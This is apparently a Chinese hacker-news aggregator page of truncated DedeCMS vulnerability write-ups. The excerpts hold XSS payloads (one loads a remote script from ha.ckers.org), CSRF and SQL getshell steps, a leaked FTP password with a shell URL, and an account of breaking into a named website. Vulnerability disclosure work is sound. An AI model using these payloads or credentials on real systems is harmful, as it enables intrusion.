记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

dedeCMS友情链接getshell漏洞分析

在tpl.php中/*--------------------------- function savetagfile() { } 保存标签碎片修改 --------------------------*/ else if($action=='savetagfile') { if(!preg_match("#^[a-z0-9_-]{1,}.lib.php$#i", $filename)) { ShowMsg('文件名不合法,不允许进行操作!', '-1'); exit(); } require_once(DEDEINC.'/oxwindow.class.php'); $tagname = preg_replace("
发布时间:2017-01-02 13:35 | 阅读:396523 | 评论:0 | 标签:PHP dedecms 友情链接 cms 漏洞

DedeCms利用Csrf创建文件与执行sql语句进行getshell过程与思路

00x01ver.txt版本为20160816由于X_Al3r提交过补天,所以最新版本已经不能复现,所以我特地问了他要了前一个版本过来写这篇文章  这里便是Csrf触发点,我们创建文件的时候抓取他的POST包POST /uploads/dede/file_manage_control.php HTTP/1.1 Host: 127.0.0.1 Content-Length: 151 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://127.0.0.1 Upgrade-Insecure-Requests
发布时间:2016-09-19 12:00 | 阅读:139063 | 评论:0 | 标签:CSRF cms dedecms

织梦(DedeCMS)V5.7SP1后台安全使用的注意事项

目前,国内非常多的网站都在使用织梦后台,因为织梦后台的易用性是非常值得称道的,但是,易用并不意味着万无一失,很多的织梦后台就曾经遇到过被入侵或者导入垃圾信息的情况,这里我们就来分享一下在使用织梦V5.7SP1的过程中到底有哪些需要注意的地方。织梦使用注意事项目录安全性:对于没有后台脚本存在的目录,比如templets等,建议设置禁止运行后台脚本。删除多余目录:/install/目录在后台完成安装之后就没什么用了,可以删除,如果不用织梦的会员功能,/member/目录也可以删除,如果更改文件生成目录的话,/a/目录也可以删除。关闭会员功能:如果不用会员系统,建议关闭,进入系统-会员设置,把“是否开启会员功能”设置为“否”。禁止会员投稿:允许会员投稿是造成垃圾数据被导
发布时间:2016-09-10 21:45 | 阅读:112148 | 评论:0 | 标签:cms dedecms

dedecms v5.7缓存文件导致任意代码执行(有条件)

初学代码审计,还是怀念当年鬼哥的plus/search.php getshell。。。在首页搜索会生成一个缓存文件,路径:datacachetypename.inc内容:<?php$typeArr[1] = '123';?>123就是网站栏目的名称,可以把123改成123‘;echo phinfo();#内容是网站栏目的名称点击搜索,加载缓存文件 漏洞证明: 修复方案: 你们更专业
发布时间:2015-09-04 02:55 | 阅读:124919 | 评论:0 | 标签:cms dedecms

dedecms v5.7 文件包含导致任意代码执行

安全盒子团队(www.secbox.cn)今日发现了织梦dedecms的一个代码执行漏洞,该漏洞可执行任意代码导致getshell, 影响版本:≤V5.7SP1正式版(2014-06-27)概述:安全盒子团队在审计织梦dedecms时发现,某处过滤不严格,可任意代码执行,导致getshell漏洞细节:需要登录后台在后台的随机模板设置跟入article_template_rand.php看到这里 //对旧文档进行随机模板处理else if($dopost=='makeold'){set_time_limit(3600);if(!file_exists($m_file)){AjaxHead();echo "配置文件不存在!";exit();}requir
发布时间:2015-02-28 20:05 | 阅读:88130 | 评论:0 | 标签:cms dedecms

dedecms 漏洞扫描

print u"---------------------------------------------------------------------"    print u"   软件只是娱乐测试  软件使用方法   main.exe url.txt     软件名 扫描URL"    print u"                    针对dedecms 漏洞写的一些插件&n
发布时间:2015-02-24 09:50 | 阅读:215453 | 评论:0 | 标签:论坛原创{ Original Paper } cms 扫描 漏洞 dedecms

dedecms官网后台更新功能疑似被入侵(下载恶意EXE木马)

织梦的后台都会嵌套一个织梦官网的一个页面,检查现在使用的版本是否是最新的版本,是否需要更新,而正是这个页面里面今天打开会出现一个exe的下载文件。然后QQ管家就开始报病毒了测试地址:http://newver.api.dedecms.com/index.php?c=info57&version=V57_GBK_SP1&phpver=5.2.3&os=WINNT&mysqlver=5.00&uptime=2013-09-22 漏洞证明:织梦的后台都会嵌套一个织梦官网的一个页面,检查现在使用的版本是否是最新的版本,是否需要更新,而正是这个页面里面今天打开会出现一个exe的下载文件。然后QQ管家就开始报病毒了测试地址:http://newver.api.dedecms.com/
发布时间:2014-12-03 18:45 | 阅读:109624 | 评论:0 | 标签:cms dedecms

dedecms全版本设计缺陷导致验证码绕过(可用于爆破等)

dedecms 最新版!验证码绕过!验证码等于无效 根据dedecms源码 查到dedecms将session保存到文件中! //Session保存路径$sessSavePath = DEDEDATA."/sessions/";if(is_writeable($sessSavePath) && is_readable($sessSavePath)){ session_save_path($sessSavePath);} 看文件文件名就有预感 这不就是sess_+PHPSESSID 么?嘿嘿!我先访问下后台 产生验证码!然后根据cookie中的PHPSESSID访问session文件 果断什么验证码识别都是渣渣  
发布时间:2014-12-03 15:15 | 阅读:119326 | 评论:0 | 标签:cms dedecms

dedecms某处XSS打后台

首先购买商品在收货地址处2处XSS 分别是邮件处 和留言处确认后就可以了等待管理员进入后台维护此处一切正常但是管理员一旦点击收货人的名字或者数量的详细就会触发XSS 漏洞证明: 修复方案:过滤
发布时间:2014-11-10 23:45 | 阅读:76122 | 评论:0 | 标签:xss cms dedecms

DedeCMS-V5.7-SP1(2014-07-25)sql注入+新绕过思路

让我们来看看这个文件/include/shopcar.class.php提取关键加解密函数代码code 区域function enCrypt($txt) { srand((double)microtime() * 1000000); $encrypt_key = md5(rand(0, 32000)); $ctr = 0; $tmp = ''; for($i = 0; $i < strlen($txt); $i++) { $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr; $tmp .= $encrypt_ke
发布时间:2014-11-09 12:05 | 阅读:245708 | 评论:0 | 标签:注入 cms dedecms

dedecms某分站拿shell漏洞

某IDC运维把控不严格导致FTP密码泄露,导致织梦一个奇葩分站getshell,本来不该算织梦的问题年代久远实在不知道这个是哪个IDC了,由于影响不够rank自评:5 漏洞证明:idc.dedecms.comFTP帐号密码:(dede--J9ZicK4DnsaQkF)漏洞证明文件:http://idc.dedecms.com/hack.txtshell文件地址:http://idc.dedecms.com/user/shell.asp 修复方案:这个站既然没人管嘛,你就关了它吧,反正也没人看
发布时间:2014-10-21 19:40 | 阅读:117106 | 评论:0 | 标签:cms 漏洞 dedecms

Dedecms最新版一处反射型XSS漏洞

Dedecms 一处 XSS漏洞,有图就有真相http://v57.demo.dedecms.com/plus/recommend.php?aid=1&action=sendmail&title=%3Ciframe%20src=//www.baidu.com%3E%3C/iframe%3Ehttp://v57.demo.dedecms.com/plus/recommend.php?aid=1&action=sendmail&title=%3CSCRIPT%20SRC=//ha.ckers.org/xss.js%3E%3C/SCRIPT%3E 漏洞证明: 修复方案:过滤!
发布时间:2014-09-19 20:50 | 阅读:97386 | 评论:0 | 标签:xss cms 漏洞 dedecms

DedeCMS-V5.7-UTF8-SP1 csrf getshell 无需会员中心

在黑盒测试友情链接功能的时候发现filter的一个bug网站logo处提交">_<'&quot;&lt;&gt;发现后台显示logo时居然成功引入了双引号闭合了src属性。经过多次测试发现 只要单引号后面跟&quot;就能成功闭合双引号于是提交测试代码'&quot; onerror=alert(1);//成功弹出了alert 漏洞证明:先用xss平台创建一个项目,然后自定义代码这里用的pkav的post get模块 post http://192.168.1.114/dede/file_manage_control.phpdata fmdo=edit&backurl=&activepath=&filenam
发布时间:2014-09-18 12:15 | 阅读:163956 | 评论:0 | 标签:CSRF cms dedecms

Dede后台getshell【过20130715】

测试版本为:V5.7 20130715 测试步骤: 后台——SQL命令运器——执行命令 INSERT INTO `dede_myad` (`aid`, `clsid`, `typeid`, `tagname`, `adname`, `timeset`, `starttime`, `endtime`, `normbody`, `expbody`) VALUES 2 (2000, 0, 0, 'indexTopBanner1', '首页顶部导航大图-500*60', 0, 1297933028, 1300525028, '', ''); 访问:http://site/plus/ad_js.php?aid=2000 (id请自行更换) 文件生成在:site/plus/08sec.php
发布时间:2013-10-24 02:15 | 阅读:117374 | 评论:0 | 标签:DEDECMS

DEDECMS v5.7sp1(2013-06-07) xss+csrf 0day

书签管理存在xss+csrf http://localhost/dedecms/member/flink_main.php xss:http://localhost/dedecms/member/flink_main.php?dopost=addnew&title=test’ onmouseover=alert(1);’&url=test’ onmouseover=alert(1);’ CSRF:<img src=”http://localhost/dedecms/member/flink_main.php?dopost=addnew&title=test&url=test”> 临时修复方法: 修
发布时间:2013-06-21 17:15 | 阅读:95990 | 评论:0 | 标签:web安全 CSRF dedecms xss 0day cms

我也来日道德网安,分享全过程

最近dedecms不是爆了个最新的漏洞么,于是就趁机来日下道德网安 ,发现主站http://www.hackdark.com 是DEDECMS的! 然后试试那个写一句话的exp 成功写进去了但是  ! 被狗咬了  哎最新的狗 蛋疼 这下怎么办呢 想了半天  终于有了思路  一句话写不进去 我们可以尝试写个列上级目录的php脚本嘛! 于是改下Yaseng 大牛的那个exp 把这里一句话改成列上级目录的脚本,如果把上级目录列出来不就找到后台了么,然后用那个改管理密码的exp不就秒了么 <?php print_r(scandir(“../”))?> 然后再试下一下exp  , 写进去了  但是 又蛋疼了  没有列出来目录 看下exp !!一定是双引号的问题 , ̵
发布时间:2013-06-18 17:20 | 阅读:85486 | 评论:0 | 标签:黑客攻防 dedecms 道德网安

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云